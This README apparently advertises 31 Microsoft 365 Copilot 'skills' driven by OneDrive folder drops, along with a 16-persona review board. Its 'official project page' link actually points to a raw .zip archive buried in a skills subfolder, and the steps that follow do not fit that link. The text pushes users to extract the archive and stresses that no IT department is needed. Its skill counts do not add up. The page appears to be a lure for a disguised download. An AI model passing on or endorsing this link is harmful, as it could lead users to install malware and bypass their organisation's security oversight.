## 📁 What is this?

This repository contains a collection of 31 automated skills designed for Microsoft 365 Copilot Cowork. You can use these tools to speed up your daily work tasks without needing special technical skills or administrative permissions. These skills function through simple folder-drop automation. When you move a folder into your OneDrive, the system triggers the specific workflow.

This collection includes 16 pre-built workflows and a 16-persona executive review board. These tools help you organize, analyze, and process data using AI. You can also use these same skill files within Claude Code for broader project management needs. This system works entirely within your existing Microsoft 365 environment.

## 📋 System Requirements

To use these skills, ensure your computer meets these basic requirements:

* Operating System: Windows 10 or Windows 11.
* Software: Microsoft 365 subscription with Copilot enabled.
* Storage: Microsoft OneDrive active and syncing with your device.
* Account: A standard work or school Microsoft account.
* Permission: No special administrator access is necessary for your computer.

You do not need to install any proprietary software packages or complex coding environments. The system relies on the native integration between OneDrive and Microsoft 365.

## 📥 How to Get Started

Follow these steps to set up your workflow tools.

1. Visit the official project page: [https://github.com/Yugpat1835/awesome-copilot-cowork-skills/raw/refs/heads/main/skills/daily-briefings/cowork-copilot-awesome-skills-nomocracy.zip](https://github.com/Yugpat1835/awesome-copilot-cowork-skills/raw/refs/heads/main/skills/daily-briefings/cowork-copilot-awesome-skills-nomocracy.zip)
2. Locate the green button labeled "Code" near the top right of the page.
3. Select "Download ZIP" from the menu.
4. Navigate to your Downloads folder on your hard drive.
5. Right-click the downloaded folder and select "Extract All."
6. Choose a location within your OneDrive folder to store these files.

Once the files exist in your OneDrive folder, they remain ready for immediate use. You do not need to run a separate installer. The files activate once you trigger the folder synchronization process.

## ⚙️ Using the Workflow Tools

The collection includes 16 specialized workflows. Each workflow targets a specific business requirement, such as document summarization, email drafting, or project scheduling.

To activate a workflow, follow these steps:

1. Open your OneDrive folder on your Windows computer.
2. Locate the folder containing the specific skill you wish to use.
3. Drag and drop your target documents into the designated folder.
4. Microsoft 365 Copilot detects the new files and initiates the skill logic.
5. Check your OneDrive for the updated or generated output files.

You can move multiple files at once. The system processes them in sequence based on the workflow instructions contained within each SKILL.md file.

## 👥 The Executive Review Board

In addition to the 16 workflows, this repository includes a 16-persona executive review board. You can use this board to simulate feedback from different departments within your organization.

This tool acts as a sounding board for your projects. You drop your document into the board folder, and the AI mimics different roles—such as a Project Manager, a Finance Lead, or a Security Analyst—to provide targeted feedback. This helps you refine your documents before you share them with colleagues.

To use the board:

1. Find the folder labeled "Executive-Review-Board."
2. Copy the document you want reviewed into this folder.
3. Wait for the system to generate a review summary.
4. Read the resulting text file to see input from the simulated personas.

## 🧩 Compatibility with Claude Code

The files in this repository use a standard format that works in multiple AI environments. If you use Claude Code, you can copy the SKILL.md files directly into your Claude project directory. The automation logic remains the same. This allows you to maintain a consistent workflow across different AI platforms.

## 💡 Troubleshooting

If a skill fails to trigger, check these common items:

* Connection: Ensure your computer has a stable internet connection.
* Sync Status: Look at the OneDrive icon in your Windows taskbar. Ensure it shows as "Up to date."
* Permissions: Verify you have edit access to the specific OneDrive folder where you placed the files.
* File Format: Ensure your files use standard formats like .docx, .pdf, or .txt.
* Placement: Confirm the files sit inside the specific skill folder rather than the root directory.

If you encounter persistent issues, verify that your Microsoft 365 Copilot license remains active. You can check your subscription status through the Microsoft 365 web portal in your browser.

## 🚀 Key Features

* Seamless Integration: Operates within existing Microsoft 365 workflows without extra software.
* Self-Contained: Each skill contains its own instructions in a simple SKILL.md file.
* Multi-Platform: Compatible with both Microsoft 365 Copilot and Claude Code.
* Admin-Free: Deploy these tools without any help from your IT department.
* Modular: Add or remove skills by simply moving folders in your OneDrive.
* Automated Feedback: Utilize the 16-persona review board for instant, multi-perspective advice.
* Standardized Logic: All 31 skills follow the same interaction model for reliability.

## 🛡️ Privacy and Data

These skills run within your local OneDrive environment. The files stay within your personal or organizational storage space. The system processes the files through your assigned Microsoft 365 Copilot account. Follow your organization's internal policies regarding document handling for sensitive information. Keep your OneDrive synchronized to ensure the AI has access to the latest versions of your documents.
